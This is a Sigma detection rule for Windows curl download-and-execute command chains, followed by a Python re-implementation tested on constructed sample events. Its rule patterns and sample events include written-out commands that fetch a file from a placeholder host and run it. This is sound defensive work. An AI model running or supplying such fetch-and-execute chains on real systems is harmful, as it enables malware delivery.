Curl Download And Execute Combination

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

Sigma rule

title: Curl Download And Execute Combination
id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
status: test
description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
references:
    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
date: 2020/01/13
modified: 2023/03/06
tags:
    - attack.execution
    - attack.t1218
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' /c '
            - 'curl '
            - 'http'
            - '-o'
            - '&'
    condition: selection
fields:
    - ParentImage
    - CommandLine
falsepositives:
    - Unknown
level: high
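As an added example (not part of the rule or the Sigma project), the selection above re-implemented in Python and run over constructed process_creation events; it assumes Sigma's default case-insensitive string matching and represents each event as a dict with `category`, `product`, `ParentImage` and `CommandLine` keys.

```python
# The five substrings from the rule's selection; Sigma's `all` modifier
# requires every one of them to occur in the CommandLine field.
RULE_SUBSTRINGS = (" /c ", "curl ", "http", "-o", "&")


def contains_all(command_line: str, needles=RULE_SUBSTRINGS) -> bool:
    """Sigma `contains|all`: every needle must be a substring of the field.

    Sigma string matching is case-insensitive by default, so both sides are
    lower-cased before the substring test.
    """
    haystack = command_line.lower()
    return all(needle.lower() in haystack for needle in needles)


def evaluate(events):
    """Return the events matching the rule's logsource and selection."""
    return [
        e for e in events
        if e.get("category") == "process_creation"
        and e.get("product") == "windows"
        and contains_all(e.get("CommandLine", ""))
    ]


# Constructed sample events, not real telemetry (example.invalid is a
# reserved name). Only the first two match: the third has no '&' chaining,
# the fourth is not launched through a shell's ' /c '.
SAMPLE_EVENTS = [
    {"category": "process_creation", "product": "windows",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl http://example.invalid/a.bin -o a.bin & a.bin"},
    {"category": "process_creation", "product": "windows",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "CMD.EXE /C CURL HTTPS://EXAMPLE.INVALID/X -O X & X"},
    {"category": "process_creation", "product": "windows",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl https://example.invalid/data.json -o data.json"},
    {"category": "process_creation", "product": "windows",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "curl.exe https://example.invalid/data.json -o data.json & type data.json"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(f"ALERT parent={hit['ParentImage']} cmd={hit['CommandLine']}")
```

The second sample shows why case-insensitive matching matters: an upper-cased `CURL ... -O` would slip past a case-sensitive substring check while still being the same download-and-execute chain.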
